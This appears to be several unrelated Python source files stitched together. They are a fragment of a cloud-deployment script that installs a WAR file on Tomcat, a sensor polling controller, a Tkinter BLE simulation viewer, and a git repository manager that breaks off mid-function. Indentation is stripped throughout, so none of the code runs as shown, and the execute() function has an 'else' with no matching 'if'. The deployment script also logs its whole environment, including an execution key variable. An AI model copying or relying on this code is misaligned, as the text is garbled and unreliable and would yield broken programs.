parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def download(child_rel_path, child_abs_path, download_dir):
artifact_downloaded_path = ctx.download_resource(child_abs_path)
new_file = os.path.join(download_dir, child_rel_path)
new_file_dir = os.path.dirname(new_file)
if not os.path.exists(new_file_dir):
os.makedirs(new_file_dir)
os.rename(artifact_downloaded_path, new_file)
ctx.logger.info('Downloaded artifact from path ' + child_abs_path + ', it\'s available now at ' + new_file)
return new_file
def download_artifacts(artifacts, download_dir):
downloaded_artifacts = {}
os.makedirs(download_dir)
for artifact_name, artifact_ref in artifacts.items():
ctx.logger.info('Download artifact ' + artifact_name)
if isinstance(artifact_ref, basestring):
downloaded_artifacts[artifact_name] = download(os.path.basename(artifact_ref), artifact_ref, download_dir)
else:
child_download_dir = os.path.join(download_dir, artifact_name)
for child_path in artifact_ref:
download(child_path['relative_path'], child_path['absolute_path'], child_download_dir)
downloaded_artifacts[artifact_name] = child_download_dir
return downloaded_artifacts
env_map = {}
env_map['TARGET_NODE'] = ctx.target.node.id
env_map['TARGET_INSTANCE'] = ctx.target.instance.id
env_map['TARGET_INSTANCES'] = get_instance_list(ctx.target.node.id)
env_map['SOURCE_NODE'] = ctx.source.node.id
env_map['SOURCE_INSTANCE'] = ctx.source.instance.id
env_map['SOURCE_INSTANCES'] = get_instance_list(ctx.source.node.id)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx.source, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx.source)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx.source)
env_map['CONTEXT_PATH'] = r'helloworld'
env_map['TOMCAT_HOME'] = r'/opt/tomcat'
node_artifacts = {
"war_file": "_a4c_artifact/War/war_file/helloWorld.war"
}
relationship_artifacts = {
"properties_file": "_a4c_artifact/War/warHostedOnTomcatWithPropertiesTomcat/properties_file/settings.properties"
}
artifacts = node_artifacts.copy()
artifacts.update(relationship_artifacts)
download_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'downloads')
env_map.update(download_artifacts(artifacts, download_dir))
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last plain output line (one not matching EXPECTED_OUTPUT_*) is treated as the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
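# A wrapped script exposes operation outputs by printing lines of the form EXPECTED_OUTPUT_<NAME>=<value>;
# every other line just becomes the candidate 'last_output'. Illustrative example (output name is hypothetical):
#   a line 'EXPECTED_OUTPUT_APP_PORT=8080' yields outputs == {'APP_PORT': '8080'}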
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Output name: {0} value: {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/War_Tomcat/warHostedOnTomcatWithPropertiesTomcat/tosca.interfaces.relationship.Configure/post_configure_source/tomcat_install_war.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.source.instance.runtime_properties['_a4c_OO:tosca.interfaces.relationship.Configure:post_configure_source:{0}'.format(k)] = v
ctx.source.instance.runtime_properties['application_url'] = r'http://' + get_attribute(ctx.source, 'public_ip_address') + r':' + r'80' + r'/' + r'helloworld'
ctx.source.instance.runtime_properties['local_application_url'] = r'http://' + get_attribute(ctx.source, 'ip_address') + r':' + r'80' + r'/' + r'helloworld'
ctx.source.instance.update()
ctx.target.instance.runtime_properties['server_url'] = r'http://' + get_attribute(ctx.target, 'public_ip_address') + r':' + r'80'
ctx.target.instance.update()
|
controller.py
|
import logging
from threading import Thread
import time
from monitor.sensors import AbstractSensor
from monitor.repository import AbstractRepository
LOG = logging.getLogger('monitor_logger')
class Controller:
'''
Controller for sensors.
'''
def __init__(self, repo: AbstractRepository):
self.repo = repo
self.running = False
self._sensors: list[AbstractSensor] = []
self._polling_threads: list[Thread] = []
@property
def sensors(self):
return self._sensors
def add_sensor(self, sensor: AbstractSensor):
'''
Add a sensor to the list of sensors.
:param sensor: sensor to add
'''
self._sensors.append(sensor)
LOG.info('Added sensor - [{}]'.format(sensor.sensor_id))
def remove_sensor(self, sensor: AbstractSensor):
'''
Remove a sensor from the list of sensors.
:param sensor: sensor to remove
'''
try:
self._sensors.remove(sensor)
LOG.info('Removed sensor - [{}]'.format(sensor.sensor_id))
except ValueError:
LOG.error('Sensor not found - [{}]'.format(sensor.sensor_id))
def start_polling(self, polling_interval: float = 2):
'''
Start polling sensors in a separate thread.
:param polling_interval: polling interval in seconds
'''
LOG.info('Starting polling sensors with interval - [{}]'.format(polling_interval))
self.running = True
for sensor in self._sensors:
t = Thread(target=self.poll_sensor, args=(sensor,))
t.start()
self._polling_threads.append(t)
def poll_sensor(self, sensor: AbstractSensor):
'''
Poll a single sensor in a loop until polling is stopped.
:param sensor: the sensor to poll; its polling_interval attribute is the poll period in seconds
'''
polling_interval = sensor.polling_interval
while self.running:
LOG.info('Polling sensor - [{}] with interval - [{}]'.format(sensor.sensor_id, polling_interval))
start = time.time()
measurement = sensor.get_measurement()
stop = time.time()
self.repo.add_measurement(measurement)
# sleep only for the remainder of the interval; never a negative duration
time.sleep(max(0.0, polling_interval - (stop - start)))
def stop_polling(self):
'''
Stop polling sensors.
'''
self.running = False
LOG.info('Stopping polling sensors')
for t in self._polling_threads:
t.join()
self._polling_threads = []
LOG.info('Polling sensors stopped')
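# Minimal usage sketch. It assumes concrete AbstractSensor / AbstractRepository implementations
# exist elsewhere in the monitor package; the class names below are hypothetical:
#   controller = Controller(repo=InMemoryRepository())
#   controller.add_sensor(TemperatureSensor(sensor_id='t1', polling_interval=2))
#   controller.start_polling()
#   ...
#   controller.stop_polling()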
|
gui.py
|
from tkinter import *
from tkinter.font import *
from guiExtensions.tk_extensions import ScrollableTV
### imports for running simulation
import csv
import time
import threading
root = Tk()
root.resizable(0, 0)
root.title("ble-simulation")
ff10=Font(family="Consolas", size=10)
ff10b=Font(family="Consolas", size=10, weight=BOLD)
CURRENT_SIMULATION = "simulations/fullBLE5.csv"
#### Attack Model Selection Menu...
def initNoAttackSim():
global CURRENT_SIMULATION
CURRENT_SIMULATION = "simulations/fullBLE5.csv"
print("executing {}".format(CURRENT_SIMULATION))
def initWhitelistSim():
global CURRENT_SIMULATION
CURRENT_SIMULATION = "simulations/BLEWhitelist.csv"
print("executing {}".format(CURRENT_SIMULATION))
menu = Menu(root)
root.config(menu=menu)
subMenu = Menu(menu)
menu.add_cascade(label="Attack Models", menu=subMenu)
sec0SubMenu = Menu(subMenu)
sec1SubMenu = Menu(subMenu)
sec2SubMenu = Menu(subMenu)
subMenu.add_cascade(label="Security Level 0", menu=sec0SubMenu)
subMenu.add_cascade(label="Security Level 1", menu=sec1SubMenu)
sec0SubMenu.add_command(label="no attacks", command=initNoAttackSim)
sec1SubMenu.add_command(label="whitelists", command=initWhitelistSim)
### importing image assets
masterFrame =Frame(root)
masterFrame.grid(row=0)
winH = 420
winW = 580
ncols = 10
nrows = 10
cellW = winW / ncols
cellH = winH / nrows
### Grid for node layout
class Node:
def __init__(self, row, col):
self.row = row
self.col = col
return
def generateGrid(nrows, ncols):
grid = []
for r in range(nrows):
row = [ Node(r, c) for c in range(ncols) ]
grid.append(row)
return grid
def drawNode(canvas, node):
x1 = cellW * node.col
y1 = cellH * node.row
x2 = x1 + cellW
y2 = y1 + cellH
canvas.create_rectangle(x1, y1, x2, y2)
return
def create_circle(x, y, r, canvas, fill="#5ED0E9"): #center coordinates, radius
x0 = x - r
y0 = y - r
x1 = x + r
y1 = y + r
return canvas.create_oval(x0, y0, x1, y1, fill=fill)
def drawGrid(canvas, grid):
for row in grid:
for node in row:
drawNode(canvas, node)
return
canvas = Canvas(masterFrame, width=winW, height=winH,
borderwidth=0, highlightthickness=0, bg="white")
canvas.grid( row=0, column=0, sticky=EW)
# init a scrollabletv for packet transfers...
bottomMasterFrame = Frame(root)
bottomMasterFrame.grid(row=1)
tv1=ScrollableTV(bottomMasterFrame, selectmode=BROWSE, height=4, show="tree headings", columns=("Time", "Sensor", "Task", "Payload"), style="Foo2.Treeview")
tv1.heading("Time", text="Time", anchor=W)
tv1.heading("Sensor", text="Sensor", anchor=W)
tv1.heading("Task", text="Task", anchor=W)
tv1.heading("Payload", text="Payload", anchor=W)
tv1.column("#0", width=0, stretch=False)
tv1.column("Time", width=100, stretch=False)
tv1.column("Sensor", width=100, stretch=False)
tv1.column("Task", width=100, stretch=False)
tv1.column("Payload", minwidth=1400, width=680, stretch=True)
tv1.grid(row=2, column=0, padx=8, pady=(8,0))
# style config: use a ScrollableStyle and pass in the ScrollableTV whose configure needs to be managed.
# if you had more than one ScrollableTV, you could modify ScrollableStyle to store a list of them and run configure on each.
s1=ScrollableTV.ScrollableStyle(tv1)
s1.configure("Foo2.Treeview", font=ff10, padding=1)
s1.configure("Foo2.Treeview.Heading", font=ff10b, padding=1)
# init a scrollbar
sb1=Scrollbar(bottomMasterFrame, orient=HORIZONTAL)
sb1.grid(row=3, sticky=EW, padx=8, pady=(0,8))
tv1.configure(xscrollcommand=sb1.set)
sb1.configure(command=tv1.xview)
sideContentFrame = Frame(masterFrame)
sideContentFrame.grid( row = 0, column=1)
## init a scrollabletv for output table of sensor events
tv2=ScrollableTV(sideContentFrame, selectmode=BROWSE, height=13, show="tree headings", columns=("Time", "Sensor", "Message"), style="Foo2.Treeview")
tv2.heading("Time", text="Time", anchor=W)
tv2.heading("Sensor", text="Sensor", anchor=W)
tv2.heading("Message", text="Message", anchor=W)
tv2.column("#0", width=0, stretch=False)
tv2.column("Time", width=80, stretch=False)
tv2.column("Sensor", width=80, stretch=False)
tv2.column("Message", minwidth=1400, width=220, stretch=True)
tv2.grid(padx=8, pady=(8,0))
s2=ScrollableTV.ScrollableStyle(tv2)
s2.configure("Foo2.Treeview", font=ff10, padding=1)
s2.configure("Foo2.Treeview.Heading", font=ff10b, padding=1)
# init a scrollbar
sb2=Scrollbar(sideContentFrame, orient=HORIZONTAL)
sb2.grid(row=1, sticky=EW, padx=8, pady=(0,8))
tv2.configure(xscrollcommand=sb2.set)
sb2.configure(command=tv2.xview)
### creation of grid
grid = generateGrid(nrows, ncols)
drawGrid(canvas, grid)
### sensor base station connection
sensorBaseConnection = canvas.create_line(160, 300, 380, 100, fill='grey', width=4, dash=(12, 1))
### base station alarm connection
baseAlarmConnection = canvas.create_line(160, 300, 400, 300, fill='black', width=4, dash=(12, 1))
# ### creating alarm
alarm = PhotoImage(file="image-assets/alarm.png")
# ### creating sensor
sensor = PhotoImage(file="image-assets/sensor.png")
# ### creating base station
base_station = PhotoImage(file="image-assets/base-station.png")
canvas.create_image(400, 300, image=alarm)
canvas.create_image(380, 100, image=sensor )
canvas.create_image(160, 300, image=base_station )
def refresh():
while True:
root.update()
def runSim():
with open(CURRENT_SIMULATION, "r") as f:
reader = csv.reader(f)
prevDuration = 0.0
for i, line in enumerate(reader):
root.update()
time.sleep(float(line[0])-prevDuration)
prevDuration = float(line[0])
root.update()
if line[1] == "node_state":
tv2.insert("", END, values=(str(line[2]), str(line[3]), str(line[4])))
root.update()
else:
tv1.insert("", END, values=(str(line[2]), str(line[3]), str(line[4]), str(line[5])))
root.update()
tv2.insert("", END, values=("", "", "Simulation complete"))
tv1.insert("", END, values=("", "","","Simulation complete"))
### control menu button onclick methods
def start():
print("starting sim")
global t2
t1 = threading.Thread(target=refresh, args=[])
t2 = threading.Thread(target=runSim, args=[])
t1.start()
t2.start()
### simulation control frame
rootFrame= Frame(sideContentFrame)
rootFrame.grid(row=2)
topFrame = Frame(rootFrame, bg="grey", width=380, height=60)
topFrame.grid(row=0)
topInnerFrame1 = Frame(topFrame, width=126, height=60)
topInnerFrame1.grid(row=0, column=0)
startbutton = Button(topInnerFrame1, text="Start", fg="black", bg="grey", command=start)
startbutton.grid(padx=23, pady=5)
root.mainloop()
|
repo_manager.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
import hashlib
import os
import shutil
import subprocess
import sys
import time
from datetime import datetime
import git
from git import Repo
from git.exc import GitCommandError
from traits.api import Any, Str, List, Event
from pychron.core.helpers.filetools import fileiter
from pychron.core.progress import open_progress
from pychron.envisage.view_util import open_view
from pychron.git_archive.diff_view import DiffView, DiffModel
from pychron.git_archive.git_objects import GitSha
from pychron.git_archive.history import BaseGitHistory
from pychron.git_archive.merge_view import MergeModel, MergeView
from pychron.git_archive.utils import get_head_commit, ahead_behind, from_gitlog, LOGFMT
from pychron.git_archive.views import NewBranchView
from pychron.loggable import Loggable
from pychron.pychron_constants import DATE_FORMAT, NULL_STR
from pychron.updater.commit_view import CommitView
def get_repository_branch(path):
r = Repo(path)
b = r.active_branch
return b.name
def grep(arg, name):
process = subprocess.Popen(["grep", "-lr", arg, name], stdout=subprocess.PIPE)
stdout, stderr = process.communicate()
return stdout, stderr
def format_date(d):
return time.strftime("%m/%d/%Y %H:%M", time.gmtime(d))
def isoformat_date(d):
if isinstance(d, (float, int)):
d = datetime.fromtimestamp(d)
return d.strftime(DATE_FORMAT)
# return time.mktime(time.gmtime(d))
class StashCTX(object):
def __init__(self, repo):
self._repo = repo
self._error = None
def __enter__(self):
try:
self._repo.git.stash()
except GitCommandError as e:
self._error = e
return e
def __exit__(self, *args, **kw):
if not self._error:
try:
self._repo.git.stash("pop")
except GitCommandError:
pass
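# Usage sketch for StashCTX: stash local changes around an operation and pop them afterwards.
# If the initial stash fails, the GitCommandError is returned from __enter__ rather than raised:
#   with StashCTX(self._repo) as stash_error:
#       if stash_error is None:
#           ...  # work against a clean working tree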
class GitRepoManager(Loggable):
"""
manage a local git repository
"""
_repo = Any
# root=Directory
path = Str
selected = Any
selected_branch = Str
selected_path_commits = List
selected_commits = List
refresh_commits_table_needed = Event
path_dirty = Event
remote = Str
def set_name(self, p):
self.name = "{}<GitRepo>".format(os.path.basename(p))
def open_repo(self, name, root=None):
"""
name: name of repo
root: root directory to create new repo
"""
if root is None:
p = name
else:
p = os.path.join(root, name)
self.path = p
self.set_name(p)
if os.path.isdir(p):
self.init_repo(p)
return True
else:
os.mkdir(p)
repo = Repo.init(p)
self.debug("created new repo {}".format(p))
self._repo = repo
return False
def init_repo(self, path):
"""
path: absolute path to repo
return True if git repo exists
"""
if os.path.isdir(path):
g = os.path.join(path, ".git")
if os.path.isdir(g):
self._repo = Repo(path)
self.set_name(path)
return True
else:
self.debug("{} is not a valid repo. Initializing now".format(path))
self._repo = Repo.init(path)
self.set_name(path)
def delete_local_commits(self, remote="origin", branch=None):
if branch is None:
branch = self._repo.active_branch.name
self._repo.git.reset("--hard", "{}/{}".format(remote, branch))
def delete_commits(self, hexsha, remote="origin", branch=None, push=True):
if branch is None:
branch = self._repo.active_branch.name
self._repo.git.reset("--hard", hexsha)
if push:
self._repo.git.push(remote, branch, "--force")
def add_paths_explicit(self, apaths):
self.index.add(apaths)
def add_paths(self, apaths):
if not isinstance(apaths, (list, tuple)):
apaths = (apaths,)
changes = self.get_local_changes(change_type=("A", "R", "M"))
changes = [os.path.join(self.path, c) for c in changes]
if changes:
self.debug("-------- local changes ---------")
for c in changes:
self.debug(c)
deletes = self.get_local_changes(change_type=("D",))
if deletes:
self.debug("-------- deletes ---------")
for c in deletes:
self.debug(c)
untracked = self.untracked_files()
if untracked:
self.debug("-------- untracked paths --------")
for t in untracked:
self.debug(t)
changes.extend(untracked)
self.debug("add paths {}".format(apaths))
ps = [p for p in apaths if p in changes]
self.debug("changed paths {}".format(ps))
changed = bool(ps)
if ps:
for p in ps:
self.debug("adding to index: {}".format(os.path.relpath(p, self.path)))
self.index.add(ps)
ps = [p for p in apaths if p in deletes]
self.debug("delete paths {}".format(ps))
delete_changed = bool(ps)
if ps:
for p in ps:
self.debug(
"removing from index: {}".format(os.path.relpath(p, self.path))
)
self.index.remove(ps, working_tree=True)
return changed or delete_changed
def add_ignore(self, *args):
ignores = []
p = os.path.join(self.path, ".gitignore")
if os.path.isfile(p):
with open(p, "r") as rfile:
ignores = [line.strip() for line in rfile]
args = [a for a in args if a not in ignores]
if args:
with open(p, "a") as afile:
for a in args:
afile.write("{}\n".format(a))
self.add(p, commit=False)
def get_modification_date(self, path):
"""
"Fri May 18 11:13:57 2018 -0600"
:param path:
:return:
"""
d = self.cmd(
"log",
"-1",
'--format="%ad"',
"--date=format:{}".format(DATE_FORMAT),
"--",
path,
)
if d:
d = d[1:-1]
return d
def out_of_date(self, branchname=None):
repo = self._repo
if branchname is None:
branchname = repo.active_branch.name
pd = open_progress(2)
origin = repo.remotes.origin
pd.change_message("Fetching {} {}".format(origin, branchname))
repo.git.fetch(origin, branchname)
pd.change_message("Complete")
# try:
# oref = origin.refs[branchname]
# remote_commit = oref.commit
# except IndexError:
# remote_commit = None
#
# branch = getattr(repo.heads, branchname)
# local_commit = branch.commit
local_commit, remote_commit = self._get_local_remote_commit(branchname)
self.debug("out of date {} {}".format(local_commit, remote_commit))
return local_commit != remote_commit
def _get_local_remote_commit(self, branchname=None):
repo = self._repo
origin = repo.remotes.origin
try:
oref = origin.refs[branchname]
remote_commit = oref.commit
except IndexError:
remote_commit = None
if branchname is None:
branch = repo.active_branch
else:
try:
branch = repo.heads[branchname]
except AttributeError:
return None, None
local_commit = branch.commit
return local_commit, remote_commit
@classmethod
def clone_from(cls, url, path):
repo = cls()
if repo.clone(url, path):
return repo
# # progress = open_progress(100)
# #
# # def func(op_code, cur_count, max_count=None, message=''):
# # if max_count:
# # progress.max = int(max_count) + 2
# # if message:
# # message = 'Cloning repository {} -- {}'.format(url, message[2:])
# # progress.change_message(message, auto_increment=False)
# # progress.update(int(cur_count))
# #
# # if op_code == 66:
# # progress.close()
# # rprogress = CallableRemoteProgress(func)
# rprogress = None
# try:
# Repo.clone_from(url, path, progress=rprogress)
# except GitCommandError as e:
# print(e)
# shutil.rmtree(path)
# # def foo():
# # try:
# # Repo.clone_from(url, path, progress=rprogress)
# # except GitCommandError:
# # shutil.rmtree(path)
# #
# # evt.set()
#
# # t = Thread(target=foo)
# # t.start()
# # period = 0.1
# # while not evt.is_set():
# # st = time.time()
# # # v = prog.get_value()
# # # if v == n - 2:
# # # prog.increase_max(50)
# # # n += 50
# # #
# # # prog.increment()
# # time.sleep(max(0, period - time.time() + st))
# # prog.close()
def clone(self, url, path, reraise=False):
try:
self._repo = Repo.clone_from(url, path)
return True
except GitCommandError as e:
self.warning_dialog(
"Cloning error: {}, url={}, path={}".format(e, url, path),
position=(100, 100),
)
if reraise:
raise
def unpack_blob(self, hexsha, p):
"""
p: str. should be absolute path
"""
repo = self._repo
tree = repo.commit(hexsha).tree
# blob = next((bi for ti in tree.trees
# for bi in ti.blobs
# if bi.abspath == p), None)
blob = None
for ts in ((tree,), tree.trees):
for ti in ts:
for bi in ti.blobs:
# print bi.abspath, p
if bi.abspath == p:
blob = bi
break
else:
print("failed unpacking", p)
return blob.data_stream.read() if blob else ""
def shell(self, cmd, *args):
repo = self._repo
func = getattr(repo.git, cmd)
return func(*args)
def truncate_repo(self, date="1 month"):
repo = self._repo
name = os.path.basename(self.path)
backup = ".{}".format(name)
repo.git.clone("--mirror", "".format(name), "./{}".format(backup))
logs = repo.git.log("--pretty=%H", '-after "{}"'.format(date))
logs = reversed(logs.split("\n"))
sha = next(logs)
gpath = os.path.join(self.path, ".git", "info", "grafts")
with open(gpath, "w") as wfile:
wfile.write(sha)
repo.git.filter_branch("--tag-name-filter", "cat", "--", "--all")
repo.git.gc("--prune=now")
def get_dag(self, branch=None, delim="$", limit=None, simplify=True):
fmt_args = ("%H", "%ai", "%ar", "%s", "%an", "%ae", "%d", "%P")
fmt = delim.join(fmt_args)
args = [
"--abbrev-commit",
"--topo-order",
"--reverse",
# '--author-date-order',
# '--decorate=full',
"--format={}".format(fmt),
]
if simplify:
args.append("--simplify-by-decoration")
if branch == NULL_STR:
args.append("--all")
else:
args.append("-b")
args.append(branch)
if limit:
args.append("-{}".format(limit))
return self._repo.git.log(*args)
def commits_iter(self, p, keys=None, limit="-"):
repo = self._repo
p = os.path.join(repo.working_tree_dir, p)
p = p.replace(" ", "\ ")
hx = repo.git.log(
"--pretty=%H", "--follow", "-{}".format(limit), "--", p
).split("\n")
def func(hi):
commit = repo.rev_parse(hi)
r = [
hi,
]
if keys:
r.extend([getattr(commit, ki) for ki in keys])
return r
return (func(ci) for ci in hx)
def odiff(self, a, b, **kw):
a = self._repo.commit(a)
return a.diff(b, **kw)
def diff(self, a, b, *args):
return self._git_command(lambda g: g.diff(a, b, *args), "diff")
def status(self):
return self._git_command(lambda g: g.status(), "status")
def report_local_changes(self):
self.debug("Local Changes to {}".format(self.path))
for p in self.get_local_changes():
self.debug("\t{}".format(p))
def commit_dialog(self):
from pychron.git_archive.commit_dialog import CommitDialog
ps = self.get_local_changes()
cd = CommitDialog(ps)
info = cd.edit_traits()
if info.result:
index = self.index
index.add([mp.path for mp in cd.valid_paths()])
self.commit(cd.commit_message)
return True
def get_local_changes(self, change_type=("M",)):
repo = self._repo
diff = repo.index.diff(None)
return [
di.a_blob.abspath
for ct in change_type
for di in diff.iter_change_type(ct)
]
# diff_str = repo.git.diff('HEAD', '--full-index')
# diff_str = StringIO(diff_str)
# diff_str.seek(0)
#
# class ProcessWrapper:
# stderr = None
# stdout = None
#
# def __init__(self, f):
# self._f = f
#
# def wait(self, *args, **kw):
# pass
#
# def read(self):
# return self._f.read()
#
# proc = ProcessWrapper(diff_str)
#
# diff = Diff._index_from_patch_format(repo, proc)
# root = self.path
#
#
#
# for diff_added in hcommit.diff('HEAD~1').iter_change_type('A'):
# print(diff_added)
# diff = hcommit.diff()
# diff = repo.index.diff(repo.head.commit)
# return [os.path.relpath(di.a_blob.abspath, root) for di in diff.iter_change_type('M')]
# patches = map(str.strip, diff_str.split('diff --git'))
# patches = ['\n'.join(p.split('\n')[2:]) for p in patches[1:]]
#
# diff_str = StringIO(diff_str)
# diff_str.seek(0)
# index = Diff._index_from_patch_format(repo, diff_str)
#
# return index, patches
#
def get_head_object(self):
return get_head_commit(self._repo)
def get_head(self, commit=True, hexsha=True):
head = self._repo
if commit:
head = head.commit()
if hexsha:
head = head.hexsha
return head
# return self._repo.head.commit.hexsha
def cmd(self, cmd, *args):
return getattr(self._repo.git, cmd)(*args)
def is_dirty(self):
return self._repo.is_dirty()
def untracked_files(self):
lines = self._repo.git.status(porcelain=True, untracked_files=True)
# Untracked files prefix in porcelain mode
prefix = "?? "
untracked_files = list()
iswindows = sys.platform == "win32"
for line in lines.split("\n"):
if not line.startswith(prefix):
continue
filename = line[len(prefix) :].rstrip("\n")
# Special characters are escaped; strip the surrounding quotes and unescape
if filename[0] == filename[-1] == '"':
filename = filename[1:-1].encode().decode("unicode_escape")
if iswindows:
filename = filename.replace("/", "\\")
untracked_files.append(os.path.join(self.path, filename))
# finalize_process(proc)
return untracked_files
def has_staged(self):
return self._repo.git.diff("HEAD", "--name-only")
# return self._repo.is_dirty()
def has_unpushed_commits(self, remote="origin", branch="master"):
if self._repo:
# return self._repo.git.log('--not', '--remotes', '--oneline')
if remote in self._repo.remotes:
return self._repo.git.log(
"{}/{}..HEAD".format(remote, branch), "--oneline"
)
def add_unstaged(self, root=None, add_all=False, extension=None, use_diff=False):
if root is None:
root = self.path
index = self.index
def func(ps, extension):
if extension:
if not isinstance(extension, tuple):
extension = (extension,)
ps = [pp for pp in ps if os.path.splitext(pp)[1] in extension]
if ps:
self.debug("adding to index {}".format(ps))
index.add(ps)
if use_diff:
pass
# try:
# ps = [diff.a_blob.path for diff in index.diff(None)]
# func(ps, extension)
# except IOError,e:
# print 'exception', e
elif add_all:
self._repo.git.add(".")
else:
for r, ds, fs in os.walk(root):
ds[:] = [d for d in ds if d[0] != "."]
ps = [os.path.join(r, fi) for fi in fs]
func(ps, extension)
def update_gitignore(self, *args):
p = os.path.join(self.path, ".gitignore")
# mode = 'a' if os.path.isfile(p) else 'w'
args = list(args)
if os.path.isfile(p):
with open(p, "r") as rfile:
for line in fileiter(rfile, strip=True):
for i, ai in enumerate(args):
if line == ai:
args.pop(i)
if args:
with open(p, "a") as wfile:
for ai in args:
wfile.write("{}\n".format(ai))
self._add_to_repo(p, msg="updated .gitignore")
def get_commit(self, hexsha):
repo = self._repo
return repo.commit(hexsha)
def tag_branch(self, tagname):
repo = self._repo
repo.create_tag(tagname)
def get_current_branch(self):
repo = self._repo
return repo.active_branch.name
def checkout_branch(self, name, inform=True):
repo = self._repo
if name.startswith("origin"):
name = name[7:]
remote = repo.remote()
rref = getattr(remote.refs, name)
repo.create_head(name, rref)
branch = repo.heads[name]
branch.set_tracking_branch(rref)
else:
branch = getattr(repo.heads, name)
try:
branch.checkout()
self.selected_branch = name
self._load_branch_history()
if inform:
self.information_dialog('Repository now on branch "{}"'.format(name))
except BaseException as e:
self.warning_dialog(
'There was an issue trying to checkout branch "{}"'.format(name)
)
raise e
def delete_branch(self, name):
self._repo.delete_head(name)
def get_branch(self, name):
return getattr(self._repo.heads, name)
def create_branch(self, name=None, commit="HEAD", inform=True):
repo = self._repo
if name is None:
nb = NewBranchView(branches=repo.branches)
info = nb.edit_traits()
if info.result:
name = nb.name
else:
return
if name not in repo.branches:
branch = repo.create_head(name, commit=commit)
branch.checkout()
if inform:
self.information_dialog('Repository now on branch "{}"'.format(name))
return name
def create_remote(self, url, name="origin", force=False):
repo = self._repo
if repo:
self.debug("setting remote {} {}".format(name, url))
# only create the remote if it doesn't already exist
if not hasattr(repo.remotes, name):
self.debug("create remote {} {}".format(name, url))
repo.create_remote(name, url)
elif force:
repo.delete_remote(name)
repo.create_remote(name, url)
def delete_remote(self, name="origin"):
repo = self._repo
if repo:
if hasattr(repo.remotes, name):
repo.delete_remote(name)
def get_branch_names(self):
return [b.name for b in self._repo.branches] + [
b.name for b in self._repo.remote().refs if b.name.lower() != "origin/head"
]
def git_history_view(self, branchname):
repo = self._repo
h = BaseGitHistory(branchname=branchname)
origin = repo.remotes.origin
try:
oref = origin.refs[branchname]
remote_commit = oref.commit
except IndexError:
remote_commit = None
branch = self.get_branch(branchname)
local_commit = branch.commit
h.local_commit = str(local_commit)
txt = repo.git.rev_list(
"--left-right", "{}...{}".format(local_commit, remote_commit)
)
commits = [ci[1:] for ci in txt.split("\n")]
commits = [repo.commit(i) for i in commits]
h.set_items(commits)
commit_view = CommitView(model=h)
return commit_view
def pull(
self,
branch="master",
remote="origin",
handled=True,
use_progress=True,
use_auto_pull=False,
):
"""
fetch and merge
if use_auto_pull is False ask user if they want to accept the available updates
"""
self.debug("pulling {} from {}".format(branch, remote))
repo = self._repo
try:
remote = self._get_remote(remote)
except AttributeError as e:
print("repo man pull", e)
return
if remote:
self.debug("pulling from url: {}".format(remote.url))
if use_progress:
prog = open_progress(
3,
show_percent=False,
title="Pull Repository {}".format(self.name),
